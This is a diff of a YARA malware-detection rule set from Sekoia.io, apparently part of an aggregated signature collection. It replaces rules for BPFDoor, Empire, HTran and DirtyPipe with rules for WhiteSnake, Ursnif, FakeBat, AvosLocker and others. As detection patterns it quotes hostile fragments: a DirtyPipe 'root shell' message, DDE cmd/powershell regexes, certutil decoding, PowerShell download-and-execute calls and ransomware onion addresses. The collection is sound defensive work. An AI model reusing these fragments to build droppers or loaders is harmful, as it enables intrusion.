+		$str15 = "\"subproc\": [" fullword ascii
+		$str16 = "&proclist=[" fullword ascii
+		$str17 = "&desklinks=[" fullword ascii
+		$str18 = "Update_%x" fullword wide
+		$str19 = "Custom_update" fullword wide
+		$str20 = "\\update_data.dat" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Backdoor_Lin_Bpfdoor : FILE
+rule SEKOIA_Apt_Sugargh0Stcampaign_Malicious_Lnk : FILE
 {
 	meta:
-		description = "Detect the BPFDoor backdoor used by the Chinese TA Red Menshen"
+		description = "Detects malicious LNK used in SugarGh0st campaign"
 		author = "Sekoia.io"
-		id = "1776ff6f-6fbb-4a81-bcad-c43b5117c67c"
-		date = "2022-05-05"
+		id = "4297c150-d125-49b9-8850-fcedf5284ae9"
+		date = "2023-12-01"
 		modified = "2024-12-19"
-		reference = "https://github.com/Neo23x0/signature-base/blob/master/yara/mal_lnx_implant_may22.yar"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_lin_bpfdoor.yar#L1-L22"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sugargh0stcampaign_malicious_lnk.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c917bd12731d761645adea72bc68c50927a0c2b0c31b2109f7065a992d338329"
+		logic_hash = "9efa131fdb02f31812c8a3f2053e1b60d0970c748eb0f82aed92a1c0719e048c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243260,26 +243117,25 @@ rule SEKOIA_Backdoor_Lin_Bpfdoor : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
-		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
-		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
-		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
+		$ = "dir /S/b *.lnk " wide
+		$ = "%temp%\\*.lnk" wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize > 10KB and filesize < 50KB and ( all of ( $op* ) )
+		uint32be( 0 ) == 0x4c000000 and filesize < 1MB and all of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Csharp : FILE
+
+rule SEKOIA_Apt_Spikedwine_Wineloader : FILE
 {
 	meta:
-		description = "Detects CSharp version of Empire"
+		description = "Detects vineloader"
 		author = "Sekoia.io"
-		id = "952e8e9b-8e4d-4550-9cf4-7ffd2f9d0672"
-		date = "2022-04-15"
+		id = "7a599076-cd9d-42c4-a83a-9a991ede19fb"
+		date = "2024-02-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_powershellempire_csharp.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_spikedwine_wineloader.yar#L3-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "536ef1167627c3dadb866d55e7eae2220c3fbd6961e2cfa71656656d984b9b90"
+		logic_hash = "c71d7ef8cb89d8fcd42e3178a729d912d5fe8e9eb396e46d7a0f5176a9398d75"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243287,31 +243143,28 @@ rule SEKOIA_Backdoor_Powershellempire_Csharp : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[-] Catastrophic .Net Agent Failure, Attempting Agent Restart:" ascii wide
-		$ = "[!] Upload failed - No Delimiter" ascii wide
-		$ = "SELECT * FROM Win32_IP4RouteTable" ascii wide
-		$ = "no shell command supplied" ascii wide
-		$ = "[-] CmdletInvocationException:" ascii wide
-		$ = "[*] File download of" ascii wide
-		$ = "Script successfully saved in memory" ascii wide
-		$ = "Invoke-Empire" ascii wide
-		$ = "website to reach:" ascii wide
+		$c = { E8 ?? ?? ?? ?? 48 8D 0D
+        ?? ?? ?? ?? 48 8D 05 ??
+        ?? ?? ?? 48 89 05 ?? ??
+        ?? ?? 48 C7 05 ?? ?? ??
+        ?? ?? ?? 00 00 48 C7 05
+        ?? ?? ?? ?? ?? ?? 00 00 }
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them and filesize < 1MB
+		pe.is_dll( ) and filesize < 100KB and for any export in pe.export_details : ( $c in ( export.offset..export.offset + 100 ) )
 }
-rule SEKOIA_Tool_Htran_Strings : FILE
+rule SEKOIA_Infostealer_Win_Whitesnake_Loader_Feb23 : FILE
 {
 	meta:
-		description = "Detects HTran based on strings"
+		description = "Finds WhiteSnake samples (loader module, bat file)"
 		author = "Sekoia.io"
-		id = "0184937e-eefa-4c6d-ae00-9b0af80dc7db"
-		date = "2022-09-09"
+		id = "f81a8a96-6fd2-4f5c-8a56-ff66ff1a80d3"
+		date = "2023-03-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_htran_strings.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_whitesnake_loader_feb23.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6a414cec8ad623c735779b9005074f88b07d88b29b23918d98a541a2612a3fa0"
+		logic_hash = "c9d4414fb17c28a3ea2e75837732e1657bdc7b2df4a7ab34e458d659441759e8"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243319,111 +243172,104 @@ rule SEKOIA_Tool_Htran_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>"
-		$ = "-tran <ConnectPort> <TransmitHost> <TransmitPort>"
-		$ = "-listen <ConnectPort> <TransmitPort>"
-		$ = "[-] There is a error...Create a new connection."
-		$ = "[+] Start Transmit (%s:%d <-> %s:%d) ......"
-		$ = "[+] Accept a Client on port %d from %s"
+		$str01 = "echo         Please wait... a while Loading data ...." ascii
+		$str02 = "CERTUTIL -f -decode" ascii
+		$str03 = "%Temp%\\build.exe" ascii
+		$crt = "-----BEGIN CERTIFICATE-----" ascii
+		$mz = "TVqQAAMAAAAEAAAA" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
+		($str01 in ( 0 .. 200 ) or $str02 in ( 0 .. 200 ) or $str03 in ( 0 .. 200 ) ) and $mz in ( @crt .. @crt + 50 ) and filesize < 100KB
 }
-rule SEKOIA_Ransomware_Win_Avoslocker : FILE
+rule SEKOIA_Apt_Mustang_Panda_Nupakage : FILE
 {
 	meta:
-		description = "Detect AvosLocker ransomware (2021-07)"
+		description = "Detects NUPAKAGE malware (only PDB, too much false positives)"
 		author = "Sekoia.io"
-		id = "fc5c2483-48cb-4282-b6cb-ac728b948607"
-		date = "2021-08-03"
+		id = "bd62c220-addc-48e9-bd01-2eff687ac3ce"
+		date = "2023-03-24"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_avoslocker.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustang_panda_nupakage.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d7f14f78ac569011ecf964109c72d75de4942361033a544350a2f73c7af64a0c"
-		score = 75
-		quality = 80
+		logic_hash = "255c77af714b1b66275f3973fb112994ccb028d5d60562bbde30df5a761f03d3"
+		score = 50
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash6 = "f810deb1ba171cea5b595c6d3f816127fb182833f7a08a98de93226d4f6a336f"
-		hash7 = "c0a42741eef72991d9d0ee8b6c0531fc19151457a8b59bdcf7b6373d1fe56e02"
-		hash8 = "84d94c032543e8797a514323b0b8fd8bd69b4183f17351628b13d1464093af2d"
 
 	strings:
-		$s1 = "cryptopp850\\rijndael_simd.cpp" ascii
-		$s2 = "cryptopp850\\sha_simd.cpp" ascii
-		$s3 = "cryptopp850\\gf2n_simd.cpp" ascii
-		$s4 = "cryptopp850\\sse_simd.cpp" ascii
+		$s1 = "D:\\Project\\NEW_PACKAGE_FILE\\Release\\NEW_PACKAGE_FILE.pdb" ascii wide
 
 	condition:
-		all of them and uint16( 0 ) == 0x5A4D and filesize > 900KB and filesize < 950KB
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
 }
-rule SEKOIA_Exploit_Linux_Eop_Dirtypipe_Strings : FILE
+
+rule SEKOIA_Backdoor_Win_Kimsuky : FILE
 {
 	meta:
-		description = "Detects DirtyPipe Local Privesc exploit"
+		description = "Detect the backdoors used by Kimsuky based on specific PE ressources"
 		author = "Sekoia.io"
-		id = "712d8a01-576e-4f43-a930-63dcdc535d93"
-		date = "2023-12-08"
+		id = "db927d1c-34cf-4501-a6ce-3e8ecdefc5a3"
+		date = "2024-06-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_dirtypipe_strings.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_kimsuky.yar#L4-L38"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0abb8de541acea57ced20f66c0aad7b010fea647996039809d36e94555dee204"
+		logic_hash = "ba40427f7e305a6e6cec6bb0165b49e6ce215ecf66fc2e05954c10e4d9acf9b0"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-
-	strings:
-		$ = "[+] hijacking suid binary.."
-		$ = "[+] dropping suid shell.."
-		$ = "[+] restoring suid binary.."
-		$ = "[+] popping root shell.."
+		hash1 = "000e2926f6e094d01c64ff972e958cd38590299e9128a766868088aa273599c7"
+		hash2 = "cca1705d7a85fe45dce9faec5790d498427b3fa8e546d7d7b57f18a925fdfa5d"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "3d570af85db2bb18265d80e7209a5c90f7cc82e0c868c0088a925df6f34e9066" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ac9ed305c6dac749163db359736e7d92fca9173ff5c9e1f021d500b306e3c5ec" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "0ca965ccf7324b098da617909d38986c1e6aae3e12d9629975f1815ed4ed3907" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "25d79e59a6b625e5c22ccb55cc49373d38cc6f20cb75504b0df1bc0804bb1247" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce5619ffe04ec569bf2565e0964156378bda7c42eb646bedbac2191a5af7bebf" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "ce10e65f7bf105fc06005340f0a8eaea9b351f3750d2818c1cf2ca25a7f495be" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "5a9e2a392c530ab8b38ff917ae0f28496107f1bde94e89515931fd29a0bfb2e5" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "19f4f3a05b809d8e33bb0004f62899ca5f9eac7e4cdba68dfd5c0a6f2d71bec3" or hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "b9c208b9bada7bac4d5bfe53992f570e34e0b4d5cfa0862de9847ddf5630ab9a" )
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_10 : FILE
+rule SEKOIA_Ransomware_Lin_Avoslocker_Strings : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detect AvosLocker ransomware for Linux by using strings from its ransom note and the onion domains"
 		author = "Sekoia.io"
-		id = "477f8b92-e231-460c-8660-487d0a97f0e2"
-		date = "2023-02-03"
+		id = "6056e15c-d656-41cb-bea0-704776c52c92"
+		date = "2022-02-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_10.yar#L1-L17"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_lin_avoslocker_strings.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6ded3f5b7e9c7f2c09e3bc0869e41775e4bb31a39e6fef8209f50f5091e8d2e2"
+		logic_hash = "b65cf6713027644de281f17a4c5c170fc09a154e7119d04a92aceed0e2d7e4fd"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
+		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
+		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
 
 	strings:
-		$ = "length = enc.GetByteCount_2(b);"
-		$ = "ms.Write(ba, 0, (length / 4) * 3);"
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
+		$s1 = "The corporations whom don't pay or fail to respond in a swift manner can be found in our blog, accessible at" ascii
+		$s2 = "http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion" ascii
+		$s3 = "http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion" ascii
 
 	condition:
-		all of them and filesize < 2MB
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SEKOIA_Apt_Mustangpanda_Coolclient : FILE
+rule SEKOIA_Apt_Badmagic_Startrevsocks_Pshscript : FILE
 {
 	meta:
-		description = "Detect COOLCLIENT via obfuscation & specific string"
+		description = "Detects BadMagic DLL Loader powershell script"
 		author = "Sekoia.io"
-		id = "2f8fdb66-03a2-400f-808b-56ae1b276d2f"
-		date = "2023-03-27"
+		id = "a6c96aee-9e78-47d2-afe3-f3c5246a9370"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_mustangpanda_coolclient.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_startrevsocks_pshscript.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "9fd552604299ecb8fa28042ee26e72bbe4fb9804ad087bf4a373b2c2e17d43b0"
+		logic_hash = "6a4615afb836330634cde9559dacfff50daef44a370f6191c6771a2066074a31"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243431,25 +243277,25 @@ rule SEKOIA_Apt_Mustangpanda_Coolclient : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {eb 14 ea 50 eb 0b ea 8b c4 a8 01 74 06 eb 0b}
-		$s2 = {66 0f d6 44 24 eb eb}
-		$s3 = "c:\\windows\\syste" fullword
+		$ = "$ExecutablePath"
+		$ = "Start-Sleep -Second 2"
+		$ = "recn -15 -rect 15"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and all of them
+		all of them and filesize < 1KB
 }
-rule SEKOIA_Tool_Ssf_Strings : FILE
+rule SEKOIA_Apt_Coathanger_Files : FILE
 {
 	meta:
-		description = "Detects SSF based on strings"
+		description = "Detects COATHANGER files"
 		author = "Sekoia.io"
-		id = "47fc3df8-a153-4045-a5f0-ed30df662984"
-		date = "2024-05-31"
+		id = "615f5ac1-14bc-4f5b-a02e-7b13cd179917"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_ssf_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_coathanger_files.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a6fa09a25c90e00466a2b59f8c604084996224c93021ad72ed8705bf05da5d97"
+		logic_hash = "5406d8a99e16f08f1ffca548ea1dd1e27e7707506e796e0fc263bcdbb681632d"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243457,30 +243303,31 @@ rule SEKOIA_Tool_Ssf_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "could NOT read SSF reply"
-		$ = "SSF reply NOT ok {}"
-		$ = "SSF reply OK"
-		$ = "SSF protocol error {}"
-		$ = "SSF reply ok"
-		$ = "SSF version NOT read {}"
-		$ = "SSF version {}"
-		$ = "SSF version NOT supported {}"
+		$ = "/data2/"
+		$ = "/httpsd"
+		$ = "/preload.so"
+		$ = "/authd"
+		$ = "/tmp/packfile"
+		$ = "/smartctl"
+		$ = "/etc/ld.so.preload"
+		$ = "/newcli"
+		$ = "/bin/busybox"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 4 of them
+		( uint32( 0 ) == 0x464c457f or uint32( 4 ) == 0x464c457f ) and filesize < 5MB and 4 of them
 }
-rule SEKOIA_Apt_Granitetyphoon_Sword2023_Strings : FILE
+rule SEKOIA_Radx_Stealer : FILE
 {
 	meta:
-		description = "Detects Sword2023 malware based on strings"
+		description = "detection of RADX stealer based on function named in the .NET payload"
 		author = "Sekoia.io"
-		id = "417b355f-9eb8-40ae-bc3b-f7f23b5ca63e"
-		date = "2023-05-25"
+		id = "bf2aae08-169c-4bc9-a1ac-80f4b79ef6d7"
+		date = "2023-12-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_granitetyphoon_sword2023_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/radx_stealer.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8644547f093295eeac30c9040796329a3e2222c06a942d14899545726c8bed78"
+		logic_hash = "b83ca089bb0ea7ad8b0f372de9a95ea9d35514f6a063b63986e6fd25bdc07095"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243488,55 +243335,58 @@ rule SEKOIA_Apt_Granitetyphoon_Sword2023_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "TERM=linux"
-		$ = ";echo"
-		$ = "sh:time out"
-		$ = "sh:read stdout error"
-		$ = "/proc/sys/kernel/random/uuid"
+		$s1 = "get_FileName" ascii fullword
+		$s2 = "set_FileName" ascii fullword
+		$f1 = "TripleDESCryptoServiceProvider" ascii fullword
+		$f2 = "SendBase64ToServer" ascii fullword
+		$f3 = "SendCommandOutputToServer" ascii fullword
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 ) and filesize < 100KB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and all of them
 }
-rule SEKOIA_Technique_Csv_Dde_Exec_Regex : FILE
+rule SEKOIA_Ursnif : FILE
 {
 	meta:
-		description = "Find .csv file exploiting DDE technique"
+		description = "Ursnif Payload"
 		author = "Sekoia.io"
-		id = "71d0e987-51ab-49bc-9d0d-d2f9006af1de"
-		date = "2022-02-02"
+		id = "ac392af3-c344-453c-9427-5bb46223e01c"
+		date = "2024-12-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/technique_csv_dde_exec_regex.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ursnif.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "fd4c64ad094b8ed543cc6990f2e4f341bb38ba0b4d335347e5676475da94dc06"
+		logic_hash = "fd3c3be5ede0a980b44560cfb9b8c4c1ee322091fa86bc9143f30dc900053c2b"
 		score = 75
-		quality = 28
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cmd0 = /=\s*wmic\|/ nocase
-		$cmd1 = /=\s*cmd\|/ nocase
-		$cmd2 = /=\s*wscript\|/ nocase
-		$cmd3 = /=\s*cscript\|/ nocase
-		$cmd4 = /=\s*powershell\|/ nocase
+		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
+		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
+		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
+		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
+		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
+		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
+		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
+		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
 
 	condition:
-		any of ( $cmd* ) and filesize < 20000
+		true and uint16( 0 ) == 0x5A4D and ( ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) ) )
 }
-rule SEKOIA_Apt_Sandworm_Orcshred_Apr2022 : FILE
+rule SEKOIA_Loader_Fakebat_Powershell_Fingerprint_May24 : FILE
 {
 	meta:
-		description = "Detects the ORCSHRED script"
+		description = "Finds FakeBat PowerShell script fingerprinting the infected host."
 		author = "Sekoia.io"
-		id = "1a88800c-29e1-4e2c-8374-f5a93dd9fd91"
-		date = "2022-04-12"
+		id = "7efcf9cf-78fe-400e-abe3-6955c394e358"
+		date = "2024-06-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_orcshred_apr2022.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_fakebat_powershell_fingerprint_may24.yar#L1-L27"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "de38cf43fa5cc756c26ae241f2e60636c2aabbe4254fdeca2340c62873498de7"
+		logic_hash = "04e5c888e5f71873c4fa2d732fbd8e40be3edf406300e65e489e1fa378028c5f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -243544,26 +243394,33 @@ rule SEKOIA_Apt_Sandworm_Orcshred_Apr2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "find /etc -name os-release >"
-		$ = "/bin/bash /var/"
-		$ = "crontab -l >"
-		$ = ".sh & disown"
+		$str01 = "Get-WmiObject Win32_ComputerSystem" ascii
+		$str02 = "-Class AntiVirusProduct" ascii
+		$str03 = "status = \"start\"" ascii
+		$str04 = " | ConvertTo-Json" ascii
+		$str05 = ".FromXmlString(" ascii
+		$str06 = " = Invoke-RestMethod -Uri " ascii
+		$str07 = ".Exception.Response.StatusCode -eq 'ServiceUnavailable'" ascii
+		$str08 = "Invoke-WebRequest -Uri $url -OutFile " ascii
+		$str09 = "--batch --yes --passphrase-fd" ascii
+		$str10 = "--decrypt --output" ascii
+		$str11 = "Invoke-Expression \"tar --extract --file=" ascii
 
 	condition:
-		3 of them and filesize < 2KB
+		7 of them and filesize < 10KB and true
 }
-rule SEKOIA_Infostealer_Win_Spacestealer : FILE
+rule SEKOIA_Infostealer_Win_Blustealer : FILE
 {
 	meta:
-		description = "Detects SpaceStealer based on specific strings"
+		description = "Detect the BluStealer infostealer based on characteristic strings"
 		author = "Sekoia.io"
-		id = "aceae3b3-1f5a-48b4-84cb-d0ba68d26df5"
-		date = "2022-11-29"
+		id = "a56b3c12-9d83-4a0b-81e8-43332e64d599"
+		date = "2022-10-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_spacestealer.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_blustealer.yar#L1-L29"
